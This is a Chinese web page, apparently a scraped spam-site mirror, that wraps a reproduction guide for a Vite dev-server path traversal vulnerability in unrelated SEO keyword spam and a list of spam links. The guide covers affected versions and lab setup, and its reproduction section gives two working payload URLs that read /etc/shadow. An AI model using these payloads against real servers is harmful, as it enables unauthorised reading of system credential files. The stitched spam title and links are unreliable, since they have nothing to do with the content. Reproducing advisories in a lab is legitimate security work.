当前位置: 首页 > wzjs >正文

十大免费行情软件视频网站优化公司哪家好

wzjs 2025/8/19 22:25:33
十大免费行情软件视频,网站优化公司哪家好,网站首页添加浮动飘窗,seo技术优化漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/410140.html

相关文章:

  • 阜阳网站建设公司宁波技术好的企业网站制作
  • 舟山专业做网站什么是企业营销型网站
  • 淄博外贸网站哪家好免费发布网站seo外链
  • 广州营销咨询公司关键词优化需要从哪些方面开展
  • wordpress升级文章编辑器成都网络优化托管公司
  • 网站开发工程师薪酬待遇做网站好的网站建设公司
  • 网站扫二维码怎么做百度手机助手安卓版
  • 男女做暖暖网站网页推广平台
  • 网站开发什么技术路线搜索引擎优化策略
  • 企业网站建设如何去规划软文营销经典案例优秀软文
  • 网站空间1g多少钱一年市场调研报告模板范文
  • 辽宁省城乡建设网站站长工具在线查询
  • 做网站的公司叫什么问题手机百度关键词优化
  • 一个网站可以做几级链接企业网站建设方案范文
  • 河南网站建设公司百度搜索推广
  • 山东住房和城乡建设局网站首页自己怎么创建网站
  • 苏州网站开发建设公司免费搜索引擎入口
  • 网站制作哪里好专业的推广公司
  • 上海网站建设哪家公司好北京百度推广客服电话多少
  • 湖南省建设工程招标网如何seo搜索引擎优化
  • 珠海做网站设计怎么建公司网站
  • 网站怎么做json数据库59软文网
  • 佛山新网站建设哪家好下载百度app最新版并安装
  • 建设厅网站密码找回公司排名seo
  • 国土网站建设自查报告永久免费自助建站系统
  • 免费网站建站排行榜bing搜索 国内版
  • 网站被k的怎么办今日新闻最新头条10条摘抄
  • 怎么自己购买域名 建设网站网络优化工程师简历
  • 郴州专业的网站建设搜狗搜索引擎网页
  • 贵州建设厅考试网站百度怎么精准搜关键词